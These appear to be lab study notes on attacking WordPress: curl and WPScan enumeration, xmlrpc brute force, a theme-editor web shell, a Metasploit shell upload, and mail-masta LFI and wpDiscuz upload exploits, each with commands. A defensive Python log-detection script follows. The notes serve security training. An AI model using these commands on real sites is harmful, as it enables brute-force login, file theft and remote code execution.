1. Discovery & Enumeration
    1. Discovery/Footprinting
      1. identify a WordPress site by checking the /robots.txt file
        1. /wp-admin
          1. redirects to wp-login.php
        2. /wp-content/plugins
          1. enumerate vulnerable plugins
        3. /wp-content/themes
          1. enumerate vulnerable themes
    2. Enumeration
      1. identify a WordPress site by looking at the page source
        1. cURL the page and grep for WordPress
          1. curl -s http://blog.inlanefreight.local | grep WordPress
          2. grep for the wp-content directory
          3. note the theme version number and check for any known vulnerabilities that affect it
          4. curl -s http://blog.inlanefreight.local/ | grep themes
          5. grep for installed plugins and enumerate their versions
          6. curl -s http://blog.inlanefreight.local/ | grep plugins
          7. check readme.txt to get the version
        2. then footprint the version number
    3. Enumerating Users
      1. default WordPress login
        1. /wp-login.php
          1. username enumeration
    4. WPScan
      1. help menu
        1. wpscan -h
      2. pass an API token from WPVulnDB
        1. --api-token <token>
      3. enumerate plugins & themes & users
        1. --enumerate
      4. enumerate all plugins
        1. --enumerate ap
      5. full scan
        1. sudo wpscan --url http://blog.inlanefreight.local --enumerate --api-token <token>
2. Attacking
    1. Login Bruteforce
      1. WPScan
        1. wp-login (standard login method)
        2. xmlrpc
          1. sudo wpscan --password-attack xmlrpc -t 20 -U <username> -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local
    2. Code Execution
      1. modify the PHP source code to execute system commands
        1. manual
          1. Log in to WordPress with the credentials
          2. Click on Appearance on the side panel and select Theme Editor
          3. this redirects to the admin panel
          4. choose an alternate theme
          5. Click on Select after selecting the theme
          6. edit an uncommon page such as 404.php to add a web shell
          7. review the inserted code to note the GET parameter used to execute commands
          8. Click on Update File at the bottom to save
          9. interact with the web shell via the browser or using cURL (using the theme path identified earlier)
          10. curl http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php?0=id
        2. using Metasploit (must specify both the vhost and the IP address)
          1. use exploit/unix/webapp/wp_admin_shell_upload
          2. set rhosts <domain>
          3. set username <username>
          4. set password <password>
          5. set lhost <our_machine>
          6. set rhost <IP_target>
          7. set VHOST <vHost>
          8. show options
          9. exploit
          10. getuid
    3. Vulnerable Plugins
      1. mail-masta
        1. suffered from an unauthenticated SQL injection and a Local File Inclusion vulnerability
          1. look at the vulnerable code for the plugin
          2. the pl parameter includes a file without any input validation or sanitization
          3. exploit this to retrieve the contents of the /etc/passwd file using cURL
          4. curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
      2. wpDiscuz
        1. intended to allow only image attachments
        2. suffered from a file upload bypass
          1. the file MIME type checks could be bypassed
          2. allowing an unauthenticated attacker to upload a malicious PHP file
          3. exploit script takes two parameters: -u the URL and -p the path to a valid post.
          4. python3 wp_discuz.py -u http://blog.inlanefreight.local -p /?p=1
          5. gain RCE
          6. use cURL to execute commands using the uploaded web shell
          7. curl -s http://blog.inlanefreight.local/wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id
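Added example, not part of these notes: a small Python detection script that parses constructed Apache access-log lines for the request patterns the notes describe (the mail-masta pl include, PHP files requested under wp-content/uploads, theme PHP files called directly with parameters, and bursts of POSTs to xmlrpc.php). The log lines, source IPs and the 10-request xmlrpc threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed Apache "combined" log lines mirroring the requests in these notes (not real traffic).
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [12/Sep/2024:10:01:02 +0000] "GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 200 1812 "-" "curl/7.88.1"',
    '10.0.0.5 - - [12/Sep/2024:10:01:05 +0000] "GET /wp-content/themes/twentynineteen/404.php?0=id HTTP/1.1" 200 54 "-" "curl/7.88.1"',
    '10.0.0.5 - - [12/Sep/2024:10:01:09 +0000] "GET /wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id HTTP/1.1" 200 54 "-" "curl/7.88.1"',
    '10.0.0.9 - - [12/Sep/2024:10:02:00 +0000] "GET /?p=1 HTTP/1.1" 200 9331 "-" "Mozilla/5.0"',
] + [f'10.0.0.7 - - [12/Sep/2024:10:03:{i:02d} +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"'
     for i in range(25)])  # constructed burst of login attempts via xmlrpc.php

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def parse_line(line):
    """Return (ip, method, path, query_dict, status) or None for lines that do not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    return m["ip"], m["method"], parts.path, parse_qs(parts.query, keep_blank_values=True), int(m["status"])

def classify_request(path, query):
    """Map one request to a finding label, or None if it matches none of the patterns from the notes."""
    lower = path.lower()
    if lower.endswith("/mail-masta/inc/campaign/count_of_send.php") and "pl" in query:
        return "mail-masta LFI attempt (pl parameter)"
    if lower.startswith("/wp-content/uploads/") and lower.endswith(".php"):
        return "PHP executed from uploads directory (possible web shell)"
    if lower.startswith("/wp-content/themes/") and lower.endswith(".php") and query:
        return "theme PHP file called directly with parameters (possible theme-editor web shell)"
    return None

def analyze(log_text, xmlrpc_threshold=10):
    """Return (ip, finding) tuples: one per suspicious request, plus one per source IP
    whose POSTs to xmlrpc.php reach the threshold (the password-attack pattern)."""
    findings, xmlrpc_posts = [], Counter()
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if not parsed:
            continue
        ip, method, path, query, _status = parsed
        if method == "POST" and path.lower() == "/xmlrpc.php":
            xmlrpc_posts[ip] += 1
        label = classify_request(path, query)
        if label:
            findings.append((ip, label))
    for ip, n in xmlrpc_posts.items():
        if n >= xmlrpc_threshold:
            findings.append((ip, f"{n} POSTs to xmlrpc.php (possible password attack)"))
    return findings

if __name__ == "__main__":
    for ip, label in analyze(SAMPLE_LOG):
        print(f"{ip:<10} {label}")
```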